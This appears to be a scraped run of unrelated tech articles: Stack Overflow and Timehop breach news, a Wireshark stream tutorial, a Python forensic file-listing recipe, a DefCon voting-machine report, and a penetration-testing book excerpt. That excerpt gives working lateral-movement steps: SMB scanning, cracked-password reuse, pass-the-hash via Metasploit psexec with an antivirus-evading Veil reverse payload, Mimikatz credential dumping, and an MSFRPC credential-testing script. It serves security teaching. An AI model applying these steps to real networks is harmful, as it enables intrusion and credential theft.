https://twitter.com/gcluley/status/1129260135778607104

Some users are acknowledging the fact that the firm has at least come forward and accepted the security violation. A user on Reddit said, “Wow. I'm glad they're letting us know early, but this sucks.”

There are other users who think that security breaches due to hacking are very common nowadays. A user on Hacker News commented, “I think we've reached a point where it's safe to say that if you're using a service -any service - assume your data is breached (or willingly given) and accessible to some unknown third party. That third party can be the government, it can be some random marketer or it can be a malicious hacker. Just hope that you have nothing anywhere that may be of interest or value to anyone, anywhere. Good luck.”

A few days ago, there were reports that Stack Overflow directly links to Facebook profile pictures. This linking unintentionally allows user activity throughout Stack Exchange to be tracked by Facebook, including the topics that users are interested in.

Read More: Facebook again, caught tracking Stack Overflow user activity and data

Stack Overflow has also assured users that more information will be provided once the company concludes its investigation.

- Stack Overflow survey data further confirms Python's popularity as it moves above Java in the most used programming language list
- 2019 Stack Overflow survey: A quick overview
- Stack Overflow is looking for a new CEO as Joel Spolsky becomes Chairman


Wireshark: Working with Packet Streams

Packt
11 Mar 2013
3 min read
Working with Packet Streams

While working on a network capture, there can be multiple network activities going on simultaneously. Consider a small example where you are browsing multiple websites through your browser at the same time. Several TCP data packets will be flowing across your network for all these websites, so it becomes a bit tedious to track the data packets belonging to a particular stream or session. This is where Follow TCP Stream comes into action.

When you are visiting multiple websites, each site maintains its own stream of data packets. By using the Follow TCP Stream option, we can apply a filter that locates packets specific to a particular stream. To view the complete stream, select your preferred TCP packet (for example, a GET or POST request). Right-clicking on it will bring up the Follow TCP Stream option.

Once you click on Follow TCP Stream, you will notice that a new filter rule is applied to Wireshark and the main capture window reflects all the data packets that belong to that stream. This can be helpful in figuring out what different requests/responses have been generated through a particular session of network interaction. If you take a closer look at the filter rule applied once you follow a stream, you will see a rule similar to tcp.stream eq <Number>. Here, Number is the stream number that has to be followed to get the various data packets.

An additional operation that can be carried out here is to save the data packets belonging to a particular stream. Once you have followed a particular stream, go to File | Save As. Then select Displayed to save only the packets belonging to the viewed stream.

Similar to following the TCP stream, we also have the option to follow UDP and SSL streams. The two options can be reached by selecting a packet of the particular protocol type (UDP or SSL) and right-clicking on it. The relevant follow option will be highlighted according to the selected protocol.

The Wireshark menu icons also provide some quick navigation options to migrate through the captured packets. These icons include:

- Go back in packet history (1): This option traces you back to the last analyzed/selected packet. Clicking on it multiple times keeps pushing you back through your selection history.
- Go forward in packet history (2): This option pushes you forward in the series of packet analysis.
- Go to packet with number (3): This option is useful in directly going to a specific packet number.
- Go to the first packet (4): This option takes you to the first packet in your current display of the capture window.
- Go to last packet (5): This option jumps your selection to the last packet in your capture window.

Summary

In this article, we learned how to work with packet streams.

Resources for Article:

Further resources on this subject:
- BackTrack 5: Advanced WLAN Attacks
- BackTrack 5: Attacking the Client
- Debugging REST Web Services


Working with Forensic Evidence Container Recipes

Packt
07 Mar 2018
13 min read
In this article by Preston Miller and Chapin Bryce, authors of Learning Python for Forensics, we introduce a recipe from our upcoming book, Python Digital Forensics Cookbook. In Python Digital Forensics Cookbook, each chapter comprises many scripts, or recipes, falling under specific themes. The "Iterating Through Files" recipe shown here is from our chapter that introduces the Sleuth Kit's Python bindings, pytsk3, and other libraries used to programmatically interact with forensic evidence containers. Specifically, this recipe shows how to access a forensic evidence container and iterate through all of its files to create an active file listing of its contents.

If you are reading this article, it goes without saying that Python is a key tool in DFIR investigations. However, most examiners are not familiar with, or do not take advantage of, the Sleuth Kit's Python bindings. Imagine being able to run your existing scripts against forensic containers without needing to mount them or export loose files. This recipe continues to introduce the library, pytsk3, that will allow us to do just that and take our scripting capabilities to the next level.

In this recipe, we learn how to recurse through the filesystem and create an active file listing. Oftentimes, one of the first questions we, as forensic examiners, are asked is "What data is on the device?". An active file listing comes in handy here. Creating a file listing of loose files is a very straightforward task in Python. However, this will be slightly more complicated because we are working with a forensic image rather than loose files. This recipe will be a cornerstone for future scripts, as it will allow us to recursively access and process every file in the image. As we continue to introduce new concepts and features from the Sleuth Kit, we will add new functionality to our previous recipes in an iterative process. In a similar way, this recipe will become integral in future recipes that iterate through directories and process files.

Getting started

Refer to the Getting started section in the Opening Acquisitions recipe for information on the build environment and setup details for pytsk3 and pyewf. All other libraries used in this script are present in Python's standard library.

How to do it...

We perform the following steps in this recipe:

1. Import argparse, csv, datetime, os, pytsk3, pyewf, and sys.
2. Identify whether the evidence container is a raw (DD) image or an EWF (E01) container.
3. Access the forensic image using pytsk3.
4. Recurse through all directories in each partition.
5. Store file metadata in a list.
6. Write the active file list to a CSV.

How it works...

This recipe's command-line handler takes three positional arguments: EVIDENCE_FILE, TYPE, and OUTPUT_CSV, which represent the path to the evidence file, the type of evidence file, and the output CSV file, respectively. Similar to the previous recipe, the optional p switch can be supplied to specify a partition type. We use the os.path.dirname() method to extract the desired output directory path for the CSV file and, with the os.makedirs() function, create the necessary output directories if they do not exist.
if __name__ == '__main__':
    # Command-line Argument Parser
    parser = argparse.ArgumentParser()
    parser.add_argument("EVIDENCE_FILE", help="Evidence file path")
    parser.add_argument("TYPE", help="Type of Evidence", choices=("raw", "ewf"))
    parser.add_argument("OUTPUT_CSV", help="Output CSV with lookup results")
    parser.add_argument("-p", help="Partition Type", choices=("DOS", "GPT", "MAC", "SUN"))
    args = parser.parse_args()

    directory = os.path.dirname(args.OUTPUT_CSV)
    if not os.path.exists(directory) and directory != "":
        os.makedirs(directory)

Once we have validated the input evidence file by checking that it exists and is a file, the four arguments are passed to the main() function. If there is an issue with the initial validation of the input, an error is printed to the console before the script exits.

    if os.path.exists(args.EVIDENCE_FILE) and os.path.isfile(args.EVIDENCE_FILE):
        main(args.EVIDENCE_FILE, args.TYPE, args.OUTPUT_CSV, args.p)
    else:
        print("[-] Supplied input file {} does not exist or is not a file".format(args.EVIDENCE_FILE))
        sys.exit(1)

In the main() function, we instantiate the volume variable with None to avoid errors when referencing it later in the script. After printing a status message to the console, we check whether the evidence type is an E01 to properly process it and create a valid pyewf handle, as demonstrated in more detail in the Opening Acquisitions recipe. Refer to that recipe for more details, as this part of the function is identical. The end result is the creation of the pytsk3 handle, img_info, for the user-supplied evidence file.

def main(image, img_type, output, part_type):
    volume = None
    print "[+] Opening {}".format(image)
    if img_type == "ewf":
        try:
            filenames = pyewf.glob(image)
        except IOError, e:
            print "[-] Invalid EWF format:\n {}".format(e)
            sys.exit(2)
        ewf_handle = pyewf.handle()
        ewf_handle.open(filenames)
        # Open PYTSK3 handle on EWF Image
        img_info = ewf_Img_Info(ewf_handle)
    else:
        img_info = pytsk3.Img_Info(image)

Next, we attempt to access the volume of the image using the pytsk3.Volume_Info() method by supplying it the image handle. If the partition type argument was supplied, we add its attribute ID as the second argument. If we receive an IOError when attempting to access the volume, we catch the exception as e and print it to the console. Notice, however, that we do not exit the script as we often do when we receive an error. We'll explain why in the next function. Ultimately, we pass the volume, img_info, and output variables to the openFS() method.

    try:
        if part_type is not None:
            attr_id = getattr(pytsk3, "TSK_VS_TYPE_" + part_type)
            volume = pytsk3.Volume_Info(img_info, attr_id)
        else:
            volume = pytsk3.Volume_Info(img_info)
    except IOError, e:
        print "[-] Unable to read partition table:\n {}".format(e)

    openFS(volume, img_info, output)

The openFS() method tries to access the filesystem of the container in two ways. If the volume variable is not None, it iterates through each partition and, if that partition meets certain criteria, attempts to open it. If, however, the volume variable is None, it instead tries to directly call the pytsk3.FS_Info() method on the image handle, img. As we saw, this latter method will work and give us filesystem access for logical images, whereas the former works for physical images. Let's look at the differences between these two methods. Regardless of the method, we create a recursed_data list to hold our active file metadata.
In the first instance, where we have a physical image, we iterate through each partition and check that it is greater than 2,048 sectors and does not contain the words "Unallocated", "Extended", or "Primary Table" in its description. For partitions meeting these criteria, we attempt to access the filesystem using the FS_Info() function by supplying the pytsk3 img object and the offset of the partition in bytes. If we are able to access the filesystem, we use the open_dir() method to get the root directory and pass that, along with the partition address ID, the filesystem object, two empty lists, and an empty string, to the recurseFiles() method. These empty lists and string will come into play in recursive calls to this function, as we will see shortly. Once the recurseFiles() method returns, we append the active file metadata to the recursed_data list. We repeat this process for each partition.

def openFS(vol, img, output):
    print "[+] Recursing through files.."
    recursed_data = []
    # Open FS and Recurse
    if vol is not None:
        for part in vol:
            if part.len > 2048 and "Unallocated" not in part.desc and "Extended" not in part.desc and "Primary Table" not in part.desc:
                try:
                    fs = pytsk3.FS_Info(img, offset=part.start*vol.info.block_size)
                except IOError, e:
                    print "[-] Unable to open FS:\n {}".format(e)
                root = fs.open_dir(path="/")
                data = recurseFiles(part.addr, fs, root, [], [], [""])
                recursed_data.append(data)

We employ a similar method in the second instance, where we have a logical image and the volume is None. In this case, we attempt to directly access the filesystem and, if successful, pass it to the recurseFiles() method and append the returned data to our recursed_data list. Once we have our active file list, we send it and the user-supplied output file path to the csvWriter() method. Let's dive into the recurseFiles() method, which is the meat of this recipe.

    else:
        try:
            fs = pytsk3.FS_Info(img)
        except IOError, e:
            print "[-] Unable to open FS:\n {}".format(e)
        root = fs.open_dir(path="/")
        data = recurseFiles(1, fs, root, [], [], [""])
        recursed_data.append(data)
    csvWriter(recursed_data, output)

The recurseFiles() function is based on an example from the FLS tool (https://github.com/py4n6/pytsk/blob/master/examples/fls.py) and David Cowen's Automating DFIR series tool dfirwizard (https://github.com/dlcowen/dfirwizard/blob/master/dfirwizard-v9.py). To start this function, we append the root directory inode to the dirs list. This list is used later to avoid unending loops. Next, we begin to loop through each object in the root directory and check that it has the attributes we would expect and that its name is not "." or "..".

def recurseFiles(part, fs, root_dir, dirs, data, parent):
    dirs.append(root_dir.info.fs_file.meta.addr)
    for fs_object in root_dir:
        # Skip ".", ".." or directory entries without a name.
        if not hasattr(fs_object, "info") or not hasattr(fs_object.info, "name") or not hasattr(fs_object.info.name, "name") or fs_object.info.name.name in [".", ".."]:
            continue

If the object passes that test, we extract its name using the info.name.name attribute. Next, we use the parent variable, which was supplied as one of the function's inputs, to manually create the file path for this object. There is no built-in method or attribute to do this automatically for us. We then check whether the file is a directory or not and set the f_type variable to the appropriate type. If the object is a file and has an extension, we extract it and store it in the file_ext variable.
If we encounter an AttributeError when attempting to extract this data, we continue on to the next object.

        try:
            file_name = fs_object.info.name.name
            file_path = "{}/{}".format("/".join(parent), fs_object.info.name.name)
            try:
                if fs_object.info.meta.type == pytsk3.TSK_FS_META_TYPE_DIR:
                    f_type = "DIR"
                    file_ext = ""
                else:
                    f_type = "FILE"
                    if "." in file_name:
                        file_ext = file_name.rsplit(".")[-1].lower()
                    else:
                        file_ext = ""
            except AttributeError:
                continue

We create variables for the object size and timestamps. Notice that we pass the dates to a convertTime() method. This function exists to convert the UNIX timestamps into a human-readable format. With these attributes extracted, we append them to the data list, using the partition address ID to ensure we keep track of which partition the object is from.

            size = fs_object.info.meta.size
            create = convertTime(fs_object.info.meta.crtime)
            change = convertTime(fs_object.info.meta.ctime)
            modify = convertTime(fs_object.info.meta.mtime)
            data.append(["PARTITION {}".format(part), file_name, file_ext, f_type, create, change, modify, size, file_path])

If the object is a directory, we need to recurse through it to access all of its subdirectories and files. To accomplish this, we append the directory name to the parent list. Then, we create a directory object using the as_directory() method. We use the inode here, which is for all intents and purposes a unique number, and check that the inode is not already in the dirs list. If it were, then we would not process this directory, as it would have already been processed. If the directory needs to be processed, we call the recurseFiles() method on the new sub_directory and pass it the current dirs, data, and parent variables. Once we have processed a given directory, we pop it from the parent list. Failing to do this would result in false file path details, as all of the former directories would continue to be referenced in the path unless removed. Most of this function sits in a large try-except block; we pass on any IOError exceptions generated during this process. Once we have iterated through all of the subdirectories, we return the data list to the openFS() function.

            if f_type == "DIR":
                parent.append(fs_object.info.name.name)
                sub_directory = fs_object.as_directory()
                inode = fs_object.info.meta.addr
                # This ensures that we don't recurse into a directory
                # above the current level and thus avoid circular loops.
                if inode not in dirs:
                    recurseFiles(part, fs, sub_directory, dirs, data, parent)
                parent.pop(-1)
        except IOError:
            pass
    dirs.pop(-1)
    return data

Let's briefly look at the convertTime() function. We've seen this type of function before: if the UNIX timestamp is not 0, we use the datetime.utcfromtimestamp() method to convert the timestamp into a human-readable format.

def convertTime(ts):
    if str(ts) == "0":
        return ""
    return datetime.utcfromtimestamp(ts)

With the active file listing data in hand, we are now ready to write it to a CSV file using the csvWriter() method. If we did find data (that is, the list is not empty), we open the output CSV file, write the headers, and loop through each list in the data variable. We use the writerows() method to write each nested list structure to the CSV file.
def csvWriter(data, output):
    if data == []:
        print "[-] No output results to write"
        sys.exit(3)
    print "[+] Writing output to {}".format(output)
    with open(output, "wb") as csvfile:
        csv_writer = csv.writer(csvfile)
        headers = ["Partition", "File", "File Ext", "File Type", "Create Date", "Modify Date", "Change Date", "Size", "File Path"]
        csv_writer.writerow(headers)
        for result_list in data:
            csv_writer.writerows(result_list)

The accompanying screenshot (not reproduced here) demonstrates the type of data this recipe extracts from forensic images.

There's more...

For this recipe, there are a number of improvements that could further increase its utility:

- Use tqdm, or another library, to create a progress bar to inform the user of the current execution progress.
- Learn about the additional metadata values that can be extracted from filesystem objects using pytsk3 and add them to the output CSV file.

Summary

In summary, we have learned how to use pytsk3 to recursively iterate through any filesystem supported by the Sleuth Kit. This comprises the basis of how we can use the Sleuth Kit to programmatically process forensic acquisitions. With this recipe, we will now be able to further interact with these files in future recipes.


At DefCon 27, DARPA's $10 million voting system could not be hacked by Voting Village hackers due to a bug

Savia Lobo
12 Aug 2019
4 min read
At the DefCon security conference in Las Vegas, hackers have come to the Voting Village for the last two years to scrutinize voting machines and analyze them for vulnerabilities. This year, at DefCon 27, the targeted machines included a $10 million project by DARPA (Defense Advanced Research Projects Agency). However, hackers were unable to break into the system, not because of robust security features, but due to technical difficulties during the setup. "A bug in the machines didn't allow hackers to access their systems over the first two days," CNet reports.

DARPA announced this voting system in March this year, hoping that it "will be impervious to hacking". The system will be designed by the Oregon-based verifiable systems firm Galois. "The agency hopes to use voting machines as a model system for developing a secure hardware platform—meaning that the group is designing all the chips that go into a computer from the ground up, and isn’t using proprietary components from companies like Intel or AMD," Wired reports.

Linton Salmon, the project's program manager at DARPA, says, "The goal of the program is to develop these tools to provide security against hardware vulnerabilities. Our goal is to protect against remote attacks."

Voting Village co-founder Harri Hursti said the five machines brought in by Galois "seemed to have had a myriad of different kinds of problems. Unfortunately, when you're pushing the envelope on technology, these kinds of things happen."

According to Wired, "The Darpa machines are prototypes, currently running on virtualized versions of the hardware platforms they will eventually use." However, at Voting Village 2020, DARPA plans to include complete systems for hackers to access.

Dan Zimmerman, principal researcher at Galois, said, "All of this is here for people to poke at. I don’t think anyone has found any bugs or issues yet, but we want people to find things. We’re going to make a small board solely for the purpose of letting people test the secure hardware in their homes and classrooms and we’ll release that."

Sen. Wyden says if voting system security standards fail to change, the consequences will be much worse than the 2016 elections

After the cyberattacks around the 2016 U.S. presidential elections, the risk to voters' data in next year's presidential elections is higher still. Senator Ron Wyden said that if voting system security standards fail to change, the consequences could be far worse than the 2016 elections. In his speech on Friday at the Voting Village, Wyden said, "If nothing happens, the kind of interference we will see from hostile foreign actors will make 2016 look like child's play. We're just not prepared, not even close, to stop it."

Wyden proposed an election security bill requiring paper ballots in 2018. However, the bill was blocked in the Senate by Majority Leader Mitch McConnell, who called it partisan legislation. On Friday, a furious Wyden held McConnell responsible, calling him the reason why Congress hasn't been able to fix election security issues. "It sure seems like Russia's No. 1 ally in compromising American election security is Mitch McConnell," Wyden said.

https://twitter.com/ericgeller/status/1159929940533321728

According to a security researcher, the voting system has a terrible software vulnerability

Dan Wallach, a security researcher at Rice University in Houston, Texas, told Wired, "There’s a terrible software vulnerability in there. I know because I wrote it. It’s a web server that anyone can connect to and read/write arbitrary memory. That’s so bad. But the idea is that even with that in there, an attacker still won’t be able to get to things like crypto keys or anything really. All they would be able to do right now is crash the system."

According to CNet, "While the voting process worked, the machines weren't able to connect with external devices, which hackers would need in order to test for vulnerabilities. One machine couldn't connect to any networks, while another had a test suite that didn't run, and a third machine couldn't get online."

The prototype machine allows people to vote with a touchscreen and print out their ballot, then insert it into the verification machine, which ensures that votes are valid through a security scan. According to Wired, Galois even added vulnerabilities on purpose to see how its system defended against flaws.

https://twitter.com/VotingVillageDC/status/1160663776884154369

To know more about this news in detail, head over to the Wired report.

DARPA plans to develop a communication platform similar to WhatsApp
DARPA’s $2 Billion ‘AI Next’ campaign includes a Next-Generation Nonsurgical Neurotechnology (N3) program
Black Hat USA 2019 conference Highlights: IBM’s ‘warshipping’, OS threat intelligence bots, Apple’s $1M bug bounty programs and much more!

Exploiting Services with Python

Packt
24 Sep 2015
15 min read
In this article by Christopher Duffy, author of the book Learning Python Penetration Testing, we will look at testing for the synchronization of account credentials. One of the big misconceptions with testing today is the prevalence of exploitable memory corruption flaws: you will still find vulnerabilities that can be exploited by overflowing the stack or heap, but they are significantly reduced in number or more complex to exploit.

Testing for the synchronization of account credentials

With these results, we can determine if any of these credentials are reused in the network. We know there are primarily Windows hosts in the target network, but we need to identify which ones have port 445 open. We can then try to determine which accounts might grant us access when the following command is run:

nmap -sS -vvv -p445 192.168.195.0/24 -oG output

Then, parse the results for open ports with the following command, which will provide a file of target hosts with Server Message Block (SMB) enabled:

grep 445/open output | cut -d" " -f2 >> smb_hosts

The passwords can be extracted directly from John and written to a password file that can be used for follow-on service attacks:

john --show unshadowed | cut -d: -f2 | grep -v " " > passwords

Always test on a single host the first time you run this type of attack. In this example, we are using the sys account, but it is more common to use the root account or similar administrative accounts to test password reuse (synchronization) in an environment. The following attack, using auxiliary/scanner/smb/smb_enumusers_domain, will check for two things: it will identify what systems this account has access to, and the relevant users that are currently logged into the system. In the second portion of this example, we will highlight how to identify the accounts that are actually privileged and part of the Domain.

There are good points and bad points about the smb_enumusers_domain module. The bad point is that you cannot load multiple usernames and passwords into it; that capability is reserved for the smb_login module. The problem with smb_login is that it is extremely noisy, as many signature detection tools flag this method of testing for logins. A third module, smb_enumusers, can also be used, but it only provides details related to local users, as it identifies users based on the Security Accounts Manager (SAM) file contents. So, if a user has a Domain account and has logged into the box, the smb_enumusers module will not identify them. So, understand each module and its limitations when identifying targets to move to laterally.

We are going to highlight how to configure the smb_enumusers_domain module and execute it. This will show an example of gaining access to a vulnerable host and then verifying DA account membership. This information can then be used to identify where a DA is located so that Mimikatz can be used to extract credentials. For this example, we are going to use a custom exploit built with Veil as well, to attempt to bypass a resident Host Intrusion Prevention System (HIPS). More information about Veil can be found at https://github.com/Veil-Framework/Veil-Evasion.git.

So, we configure the module to use the password batman, and we target the local administrator account on the system. This can be changed, but often the default is used. Since it is the local administrator, the Domain is set to WORKGROUP.
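The original article shows this module configuration in a screenshot. It corresponds to a console session roughly like the following, where the spool path and the RHOSTS source are illustrative values of ours rather than settings taken from the figure:

spool /tmp/smb_enum.log
use auxiliary/scanner/smb/smb_enumusers_domain
set SMBUser Administrator
set SMBPass batman
set SMBDomain WORKGROUP
set RHOSTS file:/root/smb_hosts
run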
Before running commands such as these, make sure to use spool to output the results to a log file, so you can go back and review the results. As you can see from the module output, the account provided details about who was logged into the system. This means that there are logged-in users relevant to the returned account names, and that the local administrator account will work on that system. This means this system is ripe for compromise by a Pass-the-Hash (PtH) attack. The psexec module allows you to pass either the extracted LAN Manager (LM):NT LAN Manager (NTLM) hash and username combination, or just the username and password pair, to get access.

To begin with, we set up a custom multi/handler to catch the custom payload we generate with Veil. Keep in mind that I used 443 for the local port because it bypasses most HIPS, and that the local host will change depending on your host.

Now, we need to generate custom payloads with Veil to be used with the psexec module. You can do this by navigating to the Veil-Evasion installation directory and running it with python Veil-Evasion.py. Veil has a good number of payloads that can be generated with a variety of obfuscation or protection mechanisms; to see the specific payload you want to use, execute the list command. You can select the payload by typing in the number of the payload or its name. As an example, run the following commands to generate a C Sharp stager that does not use shellcode; keep in mind that this requires specific versions of .NET on the target box to work.

use cs/meterpreter/rev_tcp
set LPORT 443
set LHOST 192.168.195.160
set use_arya Y
generate

There are two components to a typical payload: the stager and the stage. A stager sets up the network connection between the attacker and the victim. Payloads that use native system languages can often be purely stager. The second part is the stage, which comprises the components that are downloaded by the stager. These can include things like your Meterpreter. If both items are combined, they are called a single; think of the malicious Universal Serial Bus (USB) drives you create, which often use singles.

The output will be an executable that will spawn an encrypted reverse HyperText Transfer Protocol Secure (HTTPS) Meterpreter. The payload can be tested with the script checkvt, which safely verifies whether the payload would be picked up by most HIPS solutions. It does this without uploading it to Virus Total, and in turn does not add the payload to the database that many HIPS providers pull from. Instead, it compares the hash of the payload to those already in the database.

Now, we can set up the psexec module to reference the custom payload for execution. Update the psexec module so that it uses the custom payload generated by Veil-Evasion via set EXE::Custom, and disable the automatic payload handler with set DisablePayloadHandler true, along the following lines:
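This is a hypothetical setup of ours; the target address and payload path are placeholders, not values from the original figure:

use exploit/windows/smb/psexec
set RHOST 192.168.195.5
set SMBUser Administrator
set SMBPass batman
set EXE::Custom /root/veil-output/compiled/payload.exe
set DisablePayloadHandler true
exploit -j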
Exploit the target box, and then attempt to identify who the DAs are in the Domain. This can be done in one of two ways: either by using the post/windows/gather/enum_domain_group_users module, or with the following command from shell access:

net group "Domain Admins"

We can then grep through the spooled output file from the previously run module to locate relevant systems that might have these DAs logged in. When gaining access to one of those systems, there would likely be DA tokens or credentials in memory, which can be extracted and reused. The following command is an example of how to analyze the log file for these types of entries:

grep <username> <spoolfile.log>

As you can see, this very simple exploit path allows you to identify where the DAs are. Once you are on the system, all you have to do is load mimikatz and extract the credentials, typically with the wdigest command, from the established Meterpreter session. Of course, this means the system has to be newer than Windows 2000 and have active credentials in memory. If not, it will take additional effort and research to move forward. To highlight this, we use our established session to extract credentials with Mimikatz. The credentials are in memory, and since the target box was a Windows XP machine, we have no conflicts and no additional research is required. In addition to the intelligence we have gathered from extracting the active DA list from the system, we now have another set of confirmed credentials that can be used. Rinsing and repeating this method of attack allows you to quickly move laterally around the network till you identify viable targets.

Automating the exploit train with Python

This exploit train is relatively simple, but we can automate a portion of it with the Metasploit Remote Procedure Call (MSFRPC). This script will use the nmap library to scan for active instances of port 445, then generate a list of targets to test using a username and password passed via arguments to the script. The script will use the same smb_enumusers_domain module to identify boxes that have the credentials reused and other viable users logged into them. First, we need to install SpiderLabs' msfrpc library for Python. This library can be found at https://github.com/SpiderLabs/msfrpc.git.

The script we are creating uses the netifaces library to identify which interface IP addresses belong to your host. It then scans for port 445, the SMB port, on the IP address, range, or Classless Inter-Domain Routing (CIDR) address. It eliminates any IP addresses that belong to your interfaces and then tests the credentials using the Metasploit module auxiliary/scanner/smb/smb_enumusers_domain. At the same time, it verifies what users are logged onto the system. The outputs of this script, in addition to the real-time responses, are two files: a log file that contains all the responses, and a file that holds the IP addresses of all the hosts that have SMB services. This Metasploit module takes advantage of DCERPC, which does not run on port 445, but we are verifying that the service is available for follow-on exploitation. This file could then be fed back into the script if you, as an attacker, find other credential sets to test. Lastly, the script can be passed hashes directly, just like the Metasploit module.

The output will be slightly different for each run of the script, depending on the console identifier you grab to execute the command; the only real difference will be the additional banner items typical of a Metasploit console initiation. Now, there are a couple of things that have to be stated. Yes, you could just generate a resource file, but when you start getting into organizations that have millions of IP addresses, this becomes unmanageable. Also, the MSFRPC can have resource files fed directly into it as well, but that can significantly slow the process. If you want to compare, rewrite this script to do the same test as the previous ssh_login.py script you wrote, but with direct MSFRPC integration.
Like all scripts, the needed libraries have to be established first. Most of these you are already familiar with; the newest one relates to the MSFRPC library by SpiderLabs. The required libraries for this script can be seen as follows:

import os, argparse, sys, time
try:
    import msfrpc
except:
    sys.exit("[!] Install the msfrpc library that can be found here: https://github.com/SpiderLabs/msfrpc.git")
try:
    import nmap
except:
    sys.exit("[!] Install the nmap library: pip install python-nmap")
try:
    import netifaces
except:
    sys.exit("[!] Install the netifaces library: pip install netifaces")

We then build a function to identify the relevant targets that are going to have the auxiliary module run against them. First, we set up the constructors and the passed parameters. Notice that we have two service names to test against for this script, microsoft-ds and netbios-ssn, as either one could represent port 445 based on the nmap results.

def target_identifier(verbose, dir, user, passwd, ips, port_num, ifaces, ipfile):
    hostlist = []
    pre_pend = "smb"
    service_name = "microsoft-ds"
    service_name2 = "netbios-ssn"
    protocol = "tcp"
    port_state = "open"
    bufsize = 0
    hosts_output = "%s/%s_hosts" % (dir, pre_pend)

After which, we configure the nmap scanner (the scanner object below is an nmap.PortScanner() instance created elsewhere in the full script) to scan for details either by file or by command line. Notice that the hostlist is a string of all the addresses loaded from the file, separated by spaces: the ipfile is opened and read, and all newlines are replaced with spaces as they are loaded into the string. This is a requirement for the specific hosts argument of the nmap library.

    if ipfile != None:
        if verbose > 0:
            print("[*] Scanning for hosts from file %s") % (ipfile)
        with open(ipfile) as f:
            hostlist = f.read().replace('\n', ' ')
        scanner.scan(hosts=hostlist, ports=port_num)
    else:
        if verbose > 0:
            print("[*] Scanning for host(s) %s") % (ips)
        scanner.scan(ips, port_num)
    open(hosts_output, 'w').close()
    hostlist = []
    if scanner.all_hosts():
        e = open(hosts_output, 'a', bufsize)
    else:
        sys.exit("[!] No viable targets were found!")

The IP addresses for all of the interfaces on the attack system are removed from the test pool.

    for host in scanner.all_hosts():
        for k, v in ifaces.iteritems():
            if v['addr'] == host:
                print("[-] Removing %s from target list since it belongs to your interface!") % (host)
                host = None

Finally, the details are written to the relevant output file and Python lists, and then returned to the original call origin.

        if host != None:
            e = open(hosts_output, 'a', bufsize)
            # Each of the two SMB service names needs its own membership test
            name = scanner[host][protocol][int(port_num)]['name']
            if service_name in name or service_name2 in name:
                if port_state in scanner[host][protocol][int(port_num)]['state']:
                    if verbose > 0:
                        print("[+] Adding host %s to %s since the service is active on %s") % (host, hosts_output, port_num)
                    hostdata = host + "\n"
                    e.write(hostdata)
                    hostlist.append(host)
            else:
                if verbose > 0:
                    print("[-] Host %s is not being added to %s since the service is not active on %s") % (host, hosts_output, port_num)
    if not scanner.all_hosts():
        e.close()
    if hosts_output:
        return hosts_output, hostlist
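To make the calling convention concrete, here is a minimal sketch, with argument values of our own choosing, of how the surrounding script might build the ifaces dictionary with netifaces and invoke the function; the full script on GitHub wires these up from argparse instead:

scanner = nmap.PortScanner()   # module-level scanner used by target_identifier()

ifaces = {}
for iface in netifaces.interfaces():
    addrs = netifaces.ifaddresses(iface)
    if netifaces.AF_INET in addrs:
        # matches the v['addr'] lookup inside target_identifier()
        ifaces[iface] = addrs[netifaces.AF_INET][0]

hosts_file, hostlist = target_identifier(1, "/tmp", "Administrator", "batman",
                                         "192.168.195.0/24", "445", ifaces, None)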
The next function creates the actual command that will be executed; this function will be called for each host the scan returned as a potential target.

def build_command(verbose, user, passwd, dom, port, ip):
    module = "auxiliary/scanner/smb/smb_enumusers_domain"
    command = '''use ''' + module + '''
set RHOSTS ''' + ip + '''
set SMBUser ''' + user + '''
set SMBPass ''' + passwd + '''
set SMBDomain ''' + dom + '''
run
'''
    return command, module

The last function actually initiates the connection with the MSFRPC and executes the relevant command per specific host.

def run_commands(verbose, iplist, user, passwd, dom, port, file):
    bufsize = 0
    e = open(file, 'a', bufsize)
    done = False

The script creates a connection with the MSFRPC and creates a console, then tracks it by a specific console_id. Do not forget, the msfconsole can have multiple sessions; as such, we have to track our session with a console_id.

    client = msfrpc.Msfrpc({})
    client.login('msf', 'msfrpcpassword')
    try:
        result = client.call('console.create')
    except:
        sys.exit("[!] Creation of console failed!")
    console_id = result['id']
    console_id_int = int(console_id)

The script then iterates over the list of IP addresses that were confirmed to have an active SMB service, and creates the necessary commands for each of those IP addresses.

    for ip in iplist:
        if verbose > 0:
            print("[*] Building custom command for: %s") % (str(ip))
        command, module = build_command(verbose, user, passwd, dom, port, ip)
        if verbose > 0:
            print("[*] Executing Metasploit module %s on host: %s") % (module, str(ip))

The command is then written to the console and we wait for the results.

        client.call('console.write', [console_id, command])
        time.sleep(1)
        while done != True:

We await the results for each command execution, verifying the data that has been returned and that the console is not still running. If it is, we delay the reading of the data. Once it has completed, the results are written to the specified output file.

            result = client.call('console.read', [console_id_int])
            if len(result['data']) > 1:
                if result['busy'] == True:
                    time.sleep(1)
                    continue
                else:
                    console_output = result['data']
                    e.write(console_output)
                    if verbose > 0:
                        print(console_output)
                    done = True
        done = False   # reset for the next host in the list

We close the file and destroy the console to clean up the work we have done.

    e.close()
    client.call('console.destroy', [console_id])

The final pieces of the script are related to setting up the arguments, setting up the constructors, and calling the functions. These components are similar to previous scripts and have not been included here for the sake of space, but the details can be found at the previously mentioned location on GitHub. The last requirement is loading the msgrpc plugin at the msfconsole with the specific password that we want. So launch the msfconsole and then execute the following within it:

load msgrpc Pass=msfrpcpassword

The command was not mistyped: Metasploit has moved to msgrpc versus msfrpc, but everyone still refers to it as msfrpc. The big difference is that the msgrpc library uses POST requests to send data, while msfrpc used eXtensible Markup Language (XML). All of this can be automated with resource files to set up the service.
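As a minimal sketch of that resource-file approach (the file name here is our own invention), the plugin load can be saved to a file and passed to msfconsole at startup:

echo "load msgrpc Pass=msfrpcpassword" > msgrpc.rc
msfconsole -r msgrpc.rc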
Summary

In this article, we highlighted a manner in which you can move through a sample environment. Specifically, we showed how to exploit a vulnerable box, escalate privileges, and extract additional credentials. From that position, we identified other viable hosts we could move laterally into and the users who were currently logged into them. We generated custom payloads with the Veil Framework to bypass HIPS, and executed a PtH attack. This allowed us to extract other credentials from memory with the tool Mimikatz. We then automated the identification of viable secondary targets and the users logged into them with Python and MSFRPC.
Timehop suffers data breach; 21 million users' data compromised

Richard Gall
09 Jul 2018
3 min read
Timehop, the social media application that brings old posts into your feed, experienced a data breach on July 4. In a post published yesterday (July 8), the team explained that 'an access credential to our cloud computing environment was compromised'. Timehop believes 21 million users have been affected by the breach. However, it was keen to state that "we have no evidence that any accounts were accessed without authorization."

